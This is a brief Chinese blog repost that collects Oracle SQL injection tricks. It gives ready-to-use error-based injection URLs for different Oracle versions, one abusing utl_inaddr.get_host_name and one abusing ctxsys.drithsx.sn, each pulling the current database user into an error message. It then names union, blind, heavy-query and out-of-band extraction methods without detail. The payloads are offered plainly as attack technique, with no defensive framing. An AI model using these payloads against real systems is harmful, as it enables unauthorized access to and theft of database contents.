Oracle 注入技巧收集

时间：2016-05-30 21:34:11 阅读：405 评论：0 收藏：0 [点我收藏+]

---恢复内容开始---

一、报错注入

（1）爆用户名（适用于：Oracle8，9和10g）：

http://192.168.2.10/ora2.php?name=1‘ and 1=utl_inaddr.get_host_name((select user from dual))--

（2）基于报错注入（适用于Oracle 11g）取信息：

ctxsys.drithsx.sn(1,(SQL语句))

例如：

http://192.168.2.10/ora1.php?name=‘ and 1 = ctxsys.drithsx.sn(1,(select user from dual))--

二、无报错信息

可通过以下几种方式来实现提取数据：

　　（1）联合查询；

　　（2）盲注；

　　（3）Heavy Queries

　　（4）Out Of Band Channels（带外通道）

---恢复内容结束---

原文：http://www.cnblogs.com/websec/p/5543866.html

踩

(0)

评论一句话评论（0）

分享档案

更多>